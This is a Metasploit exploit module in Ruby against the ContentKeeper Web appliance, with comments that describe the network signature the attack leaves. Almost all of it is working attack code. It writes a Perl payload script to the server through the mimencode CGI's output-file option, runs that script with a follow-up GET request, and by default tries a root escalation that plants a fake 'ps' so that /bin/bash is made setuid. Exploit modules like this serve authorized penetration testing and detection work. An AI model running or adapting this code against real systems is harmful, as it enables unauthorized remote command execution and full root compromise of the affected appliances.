##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for the ContentKeeper Web appliance (versions prior to
# 125.10, per the Description below).  Both #check and #exploit speak raw
# HTTP over a TCP socket (Msf::Exploit::Remote::Tcp) to the
# /cgi-bin/ck/mimencode CGI; #exploit uses that CGI's output-file option
# to write a Perl script under /cgi-bin/ck/ and then requests it.
#
# Defender notes, grounded in the requests this module actually sends:
#   * The observable pattern is a POST to /cgi-bin/ck/mimencode whose query
#     string carries "-u+-o+<filename>", followed within a few seconds by a
#     GET of /cgi-bin/ck/<filename>.
#   * The file named by OVERWRITE is replaced on the appliance and is not
#     restored by the module; its closing status message tells the operator
#     to clean up by hand.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the two module-specific options.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ContentKeeper Web Remote Command Execution',
        'Description' => %q{
          This module exploits the ContentKeeper Web Appliance. Versions prior
          to 125.10 are affected. This module exploits a combination of weaknesses
          to enable remote command execution as the Apache user. By setting
          SkipEscalation to false, this module will attempt to setuid the bash shell.
        },
        'Author' => [ 'aushack' ],
        'Arch' => [ ARCH_CMD ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '54551' ],
          [ 'OSVDB', '54552' ],
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 1024,
          'Compat' =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl telnet',
          }
        },
        'Platform' => ['unix'],
        'Targets' => [
          [ 'Automatic', {} ]
        ],
        'DisclosureDate' => '2009-02-25',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        # File under /cgi-bin/ck/ that the generated Perl script is written
        # to; #exploit later requests this same path with a GET.
        OptString.new('OVERWRITE', [ true, "The target file to upload our payload (spamkeeper.dat, bak.txt, formdate.pl etc)", 'spamkeeper.dat']),
        # Defaults to false, i.e. the escalation step in #exploit runs
        # whenever a perl payload is selected unless this is set to true.
        OptBool.new("SkipEscalation", [true, "Specify this to skip the root escalation attempt", false]),
      ]
    )
  end

  # Fingerprints the target by requesting the mimencode CGI with no
  # arguments and looking at the status line it returns.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable when the response contains
  #   "500 Internal", Safe otherwise.  If nothing is read back within the
  #   3 second get_once timeout, banner is nil, the match fails and Safe is
  #   returned, so a slow or filtered host also reads as Safe.
  def check
    connect
    sock.put("GET /cgi-bin/ck/mimencode HTTP/1.0\r\n\r\n")
    banner = sock.get_once(-1, 3)
    disconnect

    # A bare request to the CGI failing with a 500 is used as the vulnerable
    # signature; this is a heuristic, not a version check.
    if (banner =~ /500 Internal/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  # Builds a Perl CGI script around the selected payload, uploads it through
  # the mimencode CGI (base64 input, written to OVERWRITE), requests the
  # written file so the script executes, then hands off to the payload
  # handler.
  #
  # Side effects on the target: the OVERWRITE file is replaced, and unless
  # SkipEscalation is true (perl payloads only) the escalation step below is
  # included in the script.  Nothing is cleaned up automatically.
  def exploit
    # Script preamble: a CGI content-type header so Apache serves the output.
    exp = "#!/usr/bin/perl\n"
    exp << "print \"Content-type: text/html\\n\\n\"\;\n\n"
    exp << "use IO::Socket::INET;\n"

    if (datastore['PAYLOAD'] =~ /perl/)
      if not datastore['SkipEscalation']
        print_status("Attempting to facilitate root escalation...")
        exp << %q{ system("echo /bin/chmod u+s /bin/bash > ps; /bin/chmod o+x ps; PATH=.:$PATH; ./benetool stopall;"); } # We can use either 'ps' or 'grep' but ps is fine.
      end
      # Perl payloads arrive wrapped as "perl -MIO -e '<code>'"; the wrapper
      # and its quotes are stripped so the code is inlined into this script.
      exp << payload.encoded.gsub('perl -MIO -e ', '').gsub('\'', '') # We're already inside a perl script!
    else
      # Other cmd payloads are run through Perl's system(); embedded double
      # quotes are escaped so the Perl string literal stays intact.
      exp << "system(\""
      exp << payload.encoded.gsub('"', '\"')
      exp << "\");\n"
    end

    # The CGI is invoked in decode mode, so the script is sent as base64.
    body = Rex::Text.encode_base64(exp)

    connect

    # The query string presumably reaches mimencode as its argv
    # ("-u -o <file>"), which is what lets the client choose the output path.
    sploit = "POST /cgi-bin/ck/mimencode?-u+-o+#{datastore['OVERWRITE']} HTTP/1.1\r\n"
    sploit << "Host: #{datastore['RHOST']}\r\n"
    # body is base64 ASCII, so character length equals byte length here.
    sploit << "Content-Length: #{body.length}\r\n\r\n"

    print_status("Uploading payload to target...")
    sock.put(sploit + body + "\r\n\r\n")
    disconnect

    # Kernel#select with no descriptors is used as a 3 second sleep.
    select(nil, nil, nil, 3) # Wait a few seconds..
    print_status("Calling payload...")
    connect
    # Requesting the overwritten file is what makes Apache execute the script.
    req = "GET /cgi-bin/ck/#{datastore['OVERWRITE']} HTTP/1.1\r\n" # Almost all files are owned by root, chmod'ed 777 :) rwx
    req << "Host: #{datastore['RHOST']}\r\n"
    sock.put(req + "\r\n\r\n")

    # Let the payload handler run before the request socket is torn down.
    handler
    disconnect
    select(nil, nil, nil, 3) # Wait for session creation.
    # The success message is inferred from a session having been created; the
    # module never verifies the setuid bit was actually set.
    if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/
      print_status("Privilege escalation appears to have worked!")
      print_status("/bin/bash is now root setuid! Type 'bash -p' to get root.")
      print_status("Don't forget to clean up afterwards (chmod -s /bin/bash and restore an original copy of the OVERWRITE file).")
    end
  end
end